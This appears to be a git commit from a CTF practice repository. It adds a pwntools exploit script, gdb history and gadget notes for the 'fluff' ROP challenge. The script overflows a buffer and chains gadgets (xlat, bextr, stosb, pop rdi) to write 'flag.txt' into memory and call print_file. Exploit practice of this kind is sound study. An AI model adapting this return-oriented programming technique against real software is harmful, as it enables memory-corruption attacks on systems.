new file: x86_64/fluff/exploit.py

new file: x86_64/fluff/gadgets
2020-12-17 19:39:54 -06:00 · 2020-12-17 19:39:54 -06:00 · 4c25bd9188
commit 4c25bd9188
parent 3f54969f58
5 changed files with 332 additions and 0 deletions
--- a/x86_64/badchars/core
+++ b/x86_64/badchars/core
--- a/x86_64/fluff/.gdb_history
+++ b/x86_64/fluff/.gdb_history
@ -0,0 +1,239 @@
 quit
 quit
 continue
 nexti
 nexti
 info reg rdi
 stepi
 nexti
 info reg rcx
 nexti
 info reg rbx
 stepi
 info reg rdx
 inro reg rbx
 info reg rbx
 quit
 stepi
 continue
 stepi
 x rbx
 info reg rbx
 quit
 conitnue
 continue
 stepi
 info reg rbx
 info reg rcx
 quit
 continue
 stepi
 info reg rbx
 info reg rdx
 quit
 continue
 stepi
 info reg rbx
 quit
 continue
 stepi
 info reg rbx
 quit
 continue
 stepi
 info reg rbx
 quit
 continue
 stepi
 stepi
 info reg rcx
 stepi
 info reg rbx
 info reg rdx
 quit
 continue
 stepi
 info reg rbx
 stepi
 info reg rbx
 quit
 stepi
 continue
 stepi
 info reg rbx
 stepi
 info reg rbx
 quit
 quit
 continue
 stepi
 info reg rbx
 quit
 stepi
 continue
 stepi
 info reg rbx
 stepi
 info reg rbx
 quit
 continue
 stepi
 info reg rbx
 stepi
 info reg rdx
 quit
 continue
 stepi
 info reg rbx
 quit
 continue
 stepi
 quit
 continue
 stepi
 info reg rbx
 quit
 quit
 continue
 stepi
 stepi
 info reg rbp
 stepi
 info reg rax
 stepi
 info reg rax
 stepi
 info reg rdi
 x/s 0x601be0
 stepi
 x/s 0x601be0
 stepi
 x/s 0x601be0
 stepi
 x/s 0x601be0
 stepi
 x/s 0x601be0
 stepi
 x/s 0x601be0
 q
 continue
 stepi
 x/s 0x601be0
 stepi
 x/s 0x601be0
 stepi
 x/s 0x601be0
 stepi
 quit
 conitnue
 continue
 continue
 stepi
 quit
 x 0x0000000000400000
 x/c 0x0000000000400000
 x/c 0x00000000004003c4
 x/c 0x0000000000400000
 quit
 continue
 stepi
 x/s 0x601be0
 x/c 0x0000000000400251
 stepi
 stepi
 x/s flag.txt
 x/s 0x601be0
 quit
 watch *0x601be0 + 7
 continue
 x/s 0x601be0
 continue
 x/s 0x601be0
 x/s 0x601be1
 x/s 0x601be0
 x/s 0x601be7
 continue
 x/s 0x601be7
 x/s 0x601be0
 continue
 quit
 watch *0x601be4
 continue
 x/s 0x601be0
 continue
 x/s 0x601be0
 continue
 x/s 0x601be0
 stepi
 stepi
 x/s $rdi
 x/s 0x601be0
 quit
 continue
 x/s 0x601be0
 quit
 break *0x00000000004006a3
 continue
 context
 stepi
 x/s $rdi
 stepi
 quit
 break *0x00000000004006a3
 continue
 context
 c/s 0x7ffdf0faba10 - 8
 x/s 0x7ffdf0faba10 - 8
 x/s 0x7ffdf0faba10 - 4
 x/s 0x7ffdf0faba10 - 16
 x/x 0x7ffdf0faba10 - 8
 x/x 0x7ffdf0faba10 
 x/x 0x7ffdf0faba10 = 4
 x/x 0x7ffdf0faba10 - 4
 x/x 0x7ffdf0faba10 + 4
 context
 info reg rdi
 info reg rip
 search 
 search 0x601be0
 search --qword 0x601be0
 search --qword 0x601be0 --writable
 search --qword 0x0000000000400510 --writable
 context
 continue
 stepi
 continue
 stepi
 quit
 break *0x00000000004006a3
 continue
 stepi
 continue
 x/i 0x400639
 x/10i 0x400639
 quit
 break *0x400639
 conitnue
 continue
 x/s 0x601be0
 continue
 x/s 0x601be0
 continue
 x/s 0x601be0
 stepi
 quit
 break *0x400639
 continue
 continue
 x/s 0x601be0
 continue
 x/s 0x601be0
 continue
 x/s 0x601be0
 stepi
 stepi
 x/s 0x601be0
 x/x 0x601be0 + 8
 x/x 0x601be0 + 9
 x/x 0x601be0 + 10
 quit
--- a/x86_64/fluff/core
+++ b/x86_64/fluff/core
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@ -0,0 +1,49 @@
 #!/usr/bin/env python3
 from pwn import *
 letter_lookups = {
        'f' : 0x00000000004003c4,
        'l' : 0x0000000000400239,
        'a' : 0x00000000004003d6,
        'g' : 0x00000000004003cf,
        '.' : 0x0000000000400251,
        't' : 0x0000000000400192,
        'x' : 0x0000000000400246}
 def write_str(dest, string, payload):
    payload += p64(0x00000000004006a3)
    payload += p64(dest)
    for c in string:
        payload += p64(0x40062a)
        payload += p64(0x4000) # if things go wrong, check endian/order
        payload += p64(letter_lookups[c] - 0x3ef2)
        payload += p64(0x0000000000400610)
        payload += p64(0)
        payload += p64(0x400628)
        payload += p64(0x400639)
    return(payload)
 prog = gdb.debug('./fluff', gdbscript='''
 break *pwnme + 151
 '''
 )
 payload = b''
 for c in range(40):
    payload += b'a'
 payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
 payload += p64(0x00000000004006a3)
 payload += p64(0x601be0) # set rdi
 payload += p64(0x0000000000400510)
 payload += b"\n"
 prog.sendline(payload)
 sleep(1)
 print(str(prog.recv(), 'UTF-8'))
 prog.interactive()
--- a/x86_64/fluff/gadgets
+++ b/x86_64/fluff/gadgets
@ -0,0 +1,44 @@
 Memory bytes information
 =======================================================
 0x00000000004003c4 : 'f'
 0x0000000000400239 : 'l'
 0x00000000004003d6 : 'a'
 0x00000000004003cf : 'g'
 0x0000000000400000 : '.'
 0x0000000000400192 : 't'
 0x0000000000400246 : 'x'
 0x0000000000400192 : 't'
 0x0000000000400610 : mov eax, 0 ; pop rbp ; ret
 400628: d7                    xlat   BYTE PTR ds:[rbx]          #mov al, [rbx + al] requires rbx
 ***
 40062a: 5a                    pop    rdx
 40062b: 59                    pop    rcx
 40062c: 48 81 c1 f2 3e 00 00  add    rcx,0x3ef2
 400633: c4 e2 e8 f7 d9        bextr  rbx,rcx,rdx
 #rdx is controller.
 rdx bits 0-7: starting bit
 rdx bits 8-15: length
 ***
 400639: aa                    stos   BYTE PTR es:[rdi],al       #moves al to rdi, then adds rdi
                                                                # requires rdi (check), al
 0000000000400510 : print_file@plt
 0x00000000004006a3 : pop rdi ; ret
 exploit:
 write to memory using al as letter
  set al to zero
  set rbx to memory location
    rcx: (location - 0x3ef2) before bextr
    rdx: 0x00 0x20 (from position zero, using 32 bits)